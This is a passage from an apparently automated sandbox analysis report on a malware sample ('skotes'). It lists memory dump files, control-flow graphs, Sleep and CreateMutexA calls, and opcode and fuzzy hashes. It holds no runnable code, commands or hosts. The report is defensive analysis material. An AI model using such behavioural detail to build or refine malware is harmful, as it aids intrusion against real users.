                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521602200.0000000000DD4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521619891.0000000000DD7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521635763.0000000000DD8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521652294.0000000000DDA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521674976.0000000000DFD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521694526.0000000000E11000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521716172.0000000000E34000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521730894.0000000000E36000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521746206.0000000000E37000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521762313.0000000000E3E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521776753.0000000000E3F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521791977.0000000000E44000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521806761.0000000000E4C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521823400.0000000000E4D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521837891.0000000000E4E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521851879.0000000000E51000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521869219.0000000000E61000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521885147.0000000000E62000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521900252.0000000000E6B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521915593.0000000000E6C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521915593.0000000000EA2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521962638.0000000000ECE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521986282.0000000000ECF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1522013474.0000000000ED7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1522037462.0000000000ED9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1522063115.0000000000EE6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1522086053.0000000000EE7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_bd0000_skotes.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CreateMutexSleep
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1464230837-0
                                                                                                                                                                                                                              • Opcode ID: 42c12082c82bee611ab309616fffa89245d278b83296e64a5b4f3617b474210b
                                                                                                                                                                                                                              • Instruction ID: 569e072e924f25d75fbd6a736806253da6f14ae1a6c80d042a8ee42f1c4c6343
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 42c12082c82bee611ab309616fffa89245d278b83296e64a5b4f3617b474210b
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3A3148716001409FFB089B78DC947ADF7E2EB85310F24469AF418E73D5EB7AA9808752
                                                                                                                                                                                                                              Function 00BDA079 Relevance: 3.1, APIs: 2, Instructions: 136sleepsynchronizationCOMMON
                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 56 bda079-bda099 60 bda09b-bda0a7 56->60 61 bda0c7-bda0e3 56->61 62 bda0bd-bda0c4 call bed663 60->62 63 bda0a9-bda0b7 60->63 64 bda0e5-bda0f1 61->64 65 bda111-bda130 61->65 62->61 63->62 68 bda930-bda994 call c06c6a Sleep CreateMutexA 63->68 70 bda107-bda10e call bed663 64->70 71 bda0f3-bda101 64->71 66 bda15e-bda916 call be80c0 65->66 67 bda132-bda13e 65->67 72 bda154-bda15b call bed663 67->72 73 bda140-bda14e 67->73 86 bda9a7-bda9a8 68->86 87 bda996-bda998 68->87 70->65 71->68 71->70 72->66 73->68 73->72 87->86 88 bda99a-bda9a5 87->88 88->86
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • Sleep.KERNELBASE(00000064), ref: 00BDA963
                                                                                                                                                                                                                              • CreateMutexA.KERNELBASE(00000000,00000000,00C33254), ref: 00BDA981
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1521311555.0000000000BD1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521295609.0000000000BD0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521311555.0000000000C32000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521363582.0000000000C39000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521379411.0000000000C3B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521396200.0000000000C47000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521486035.0000000000DA6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521506674.0000000000DA8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521529930.0000000000DC2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521547651.0000000000DC4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521564225.0000000000DC6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521564225.0000000000DD0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521602200.0000000000DD4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521619891.0000000000DD7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521635763.0000000000DD8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521652294.0000000000DDA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521674976.0000000000DFD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521694526.0000000000E11000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521716172.0000000000E34000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521730894.0000000000E36000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521746206.0000000000E37000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521762313.0000000000E3E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521776753.0000000000E3F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521791977.0000000000E44000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521806761.0000000000E4C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521823400.0000000000E4D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521837891.0000000000E4E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521851879.0000000000E51000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521869219.0000000000E61000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521885147.0000000000E62000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521900252.0000000000E6B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521915593.0000000000E6C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521915593.0000000000EA2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521962638.0000000000ECE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521986282.0000000000ECF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1522013474.0000000000ED7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1522037462.0000000000ED9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1522063115.0000000000EE6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1522086053.0000000000EE7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_bd0000_skotes.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CreateMutexSleep
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1464230837-0
                                                                                                                                                                                                                              • Opcode ID: db4279f56d7b668147e3bd2a8c45b99c186fc384dd959239390fdd8cb80f8c98
                                                                                                                                                                                                                              • Instruction ID: f19b54deae5884fcf79c6cc1586c8b8e0894ad53834fd04eeff343e2084d456f
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: db4279f56d7b668147e3bd2a8c45b99c186fc384dd959239390fdd8cb80f8c98
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3F3148317101409BFB08DB78CDC5B6DF7E2EBC6314F24429AE414A73D5EB7AA9808762
                                                                                                                                                                                                                              Function 00BDA1AE Relevance: 3.1, APIs: 2, Instructions: 135sleepsynchronizationCOMMON
                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 90 bda1ae-bda1ce 94 bda1fc-bda218 90->94 95 bda1d0-bda1dc 90->95 96 bda21a-bda226 94->96 97 bda246-bda265 94->97 98 bda1de-bda1ec 95->98 99 bda1f2-bda1f9 call bed663 95->99 100 bda23c-bda243 call bed663 96->100 101 bda228-bda236 96->101 102 bda267-bda273 97->102 103 bda293-bda916 call be80c0 97->103 98->99 104 bda935 98->104 99->94 100->97 101->100 101->104 110 bda289-bda290 call bed663 102->110 111 bda275-bda283 102->111 107 bda953-bda994 Sleep CreateMutexA 104->107 108 bda935 call c06c6a 104->108 120 bda9a7-bda9a8 107->120 121 bda996-bda998 107->121 108->107 110->103 111->104 111->110 121->120 122 bda99a-bda9a5 121->122 122->120
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • Sleep.KERNELBASE(00000064), ref: 00BDA963
                                                                                                                                                                                                                              • CreateMutexA.KERNELBASE(00000000,00000000,00C33254), ref: 00BDA981
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1521311555.0000000000BD1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521295609.0000000000BD0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521311555.0000000000C32000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521363582.0000000000C39000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521379411.0000000000C3B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521396200.0000000000C47000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521486035.0000000000DA6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521506674.0000000000DA8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521529930.0000000000DC2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521547651.0000000000DC4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521564225.0000000000DC6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521564225.0000000000DD0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521602200.0000000000DD4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521619891.0000000000DD7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521635763.0000000000DD8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521652294.0000000000DDA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521674976.0000000000DFD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521694526.0000000000E11000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521716172.0000000000E34000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521730894.0000000000E36000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521746206.0000000000E37000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521762313.0000000000E3E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521776753.0000000000E3F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521791977.0000000000E44000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521806761.0000000000E4C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521823400.0000000000E4D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521837891.0000000000E4E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521851879.0000000000E51000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521869219.0000000000E61000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521885147.0000000000E62000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521900252.0000000000E6B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521915593.0000000000E6C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521915593.0000000000EA2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521962638.0000000000ECE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521986282.0000000000ECF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1522013474.0000000000ED7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1522037462.0000000000ED9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1522063115.0000000000EE6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1522086053.0000000000EE7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_bd0000_skotes.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CreateMutexSleep
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1464230837-0
                                                                                                                                                                                                                              • Opcode ID: a868d2230d11df4f74e05b110dcd969be6ceff38412c7b51736fe9a78625851d
                                                                                                                                                                                                                              • Instruction ID: 4175e209fbe7b125d98ba06940f40723adc0917380bcd85db41defb7f5ceab19
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a868d2230d11df4f74e05b110dcd969be6ceff38412c7b51736fe9a78625851d
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 223128316011409FFB089B78DCC9B6DF7E2EBC6314F24429AE414A73E5EB7A99808752
                                                                                                                                                                                                                              Function 00BDA418 Relevance: 3.1, APIs: 2, Instructions: 133sleepsynchronizationCOMMON
                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 124 bda418-bda438 128 bda43a-bda446 124->128 129 bda466-bda482 124->129 130 bda45c-bda463 call bed663 128->130 131 bda448-bda456 128->131 132 bda484-bda490 129->132 133 bda4b0-bda4cf 129->133 130->129 131->130 138 bda93f-bda949 call c06c6a * 2 131->138 134 bda4a6-bda4ad call bed663 132->134 135 bda492-bda4a0 132->135 136 bda4fd-bda916 call be80c0 133->136 137 bda4d1-bda4dd 133->137 134->133 135->134 135->138 141 bda4df-bda4ed 137->141 142 bda4f3-bda4fa call bed663 137->142 155 bda94e 138->155 156 bda949 call c06c6a 138->156 141->138 141->142 142->136 157 bda953-bda994 Sleep CreateMutexA 155->157 158 bda94e call c06c6a 155->158 156->155 160 bda9a7-bda9a8 157->160 161 bda996-bda998 157->161 158->157 161->160 162 bda99a-bda9a5 161->162 162->160
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • Sleep.KERNELBASE(00000064), ref: 00BDA963
                                                                                                                                                                                                                              • CreateMutexA.KERNELBASE(00000000,00000000,00C33254), ref: 00BDA981
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1521311555.0000000000BD1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521295609.0000000000BD0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521311555.0000000000C32000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521363582.0000000000C39000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521379411.0000000000C3B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521396200.0000000000C47000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521486035.0000000000DA6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521506674.0000000000DA8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521529930.0000000000DC2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521547651.0000000000DC4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521564225.0000000000DC6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521564225.0000000000DD0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521602200.0000000000DD4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521619891.0000000000DD7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521635763.0000000000DD8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521652294.0000000000DDA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521674976.0000000000DFD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521694526.0000000000E11000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521716172.0000000000E34000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521730894.0000000000E36000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521746206.0000000000E37000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521762313.0000000000E3E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521776753.0000000000E3F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521791977.0000000000E44000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521806761.0000000000E4C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521823400.0000000000E4D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521837891.0000000000E4E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521851879.0000000000E51000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521869219.0000000000E61000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521885147.0000000000E62000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521900252.0000000000E6B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521915593.0000000000E6C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521915593.0000000000EA2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521962638.0000000000ECE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521986282.0000000000ECF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1522013474.0000000000ED7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1522037462.0000000000ED9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1522063115.0000000000EE6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1522086053.0000000000EE7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_bd0000_skotes.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CreateMutexSleep
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1464230837-0
                                                                                                                                                                                                                              • Opcode ID: 65fdd63d1b86976de3e6c2493ed0a2b37262a6468f08b3dd03e45a0e1bde94dc
                                                                                                                                                                                                                              • Instruction ID: 27f5796604abffb6b53b4cb4e8fb5f5ac756bf6b95fb46061d3b334438642f9a
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 65fdd63d1b86976de3e6c2493ed0a2b37262a6468f08b3dd03e45a0e1bde94dc
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 31318C316011409BFB08AB78DCC9B6DF7E1EFC1314F24429AF414A73D5EBB959808752
                                                                                                                                                                                                                              Function 00BDA54D Relevance: 3.1, APIs: 2, Instructions: 132sleepsynchronizationCOMMON
                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 164 bda54d-bda56d 168 bda56f-bda57b 164->168 169 bda59b-bda5b7 164->169 172 bda57d-bda58b 168->172 173 bda591-bda598 call bed663 168->173 170 bda5b9-bda5c5 169->170 171 bda5e5-bda604 169->171 174 bda5db-bda5e2 call bed663 170->174 175 bda5c7-bda5d5 170->175 176 bda606-bda612 171->176 177 bda632-bda916 call be80c0 171->177 172->173 178 bda944-bda949 call c06c6a 172->178 173->169 174->171 175->174 175->178 182 bda628-bda62f call bed663 176->182 183 bda614-bda622 176->183 190 bda94e 178->190 191 bda949 call c06c6a 178->191 182->177 183->178 183->182 195 bda953-bda994 Sleep CreateMutexA 190->195 196 bda94e call c06c6a 190->196 191->190 198 bda9a7-bda9a8 195->198 199 bda996-bda998 195->199 196->195 199->198 200 bda99a-bda9a5 199->200 200->198
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • Sleep.KERNELBASE(00000064), ref: 00BDA963
                                                                                                                                                                                                                              • CreateMutexA.KERNELBASE(00000000,00000000,00C33254), ref: 00BDA981
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1521311555.0000000000BD1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521295609.0000000000BD0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521311555.0000000000C32000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521363582.0000000000C39000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521379411.0000000000C3B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521396200.0000000000C47000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521486035.0000000000DA6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521506674.0000000000DA8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521529930.0000000000DC2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1521547651.0000000000DC4000.00000080.00000001.01000000.00000007.sdmpDownload File
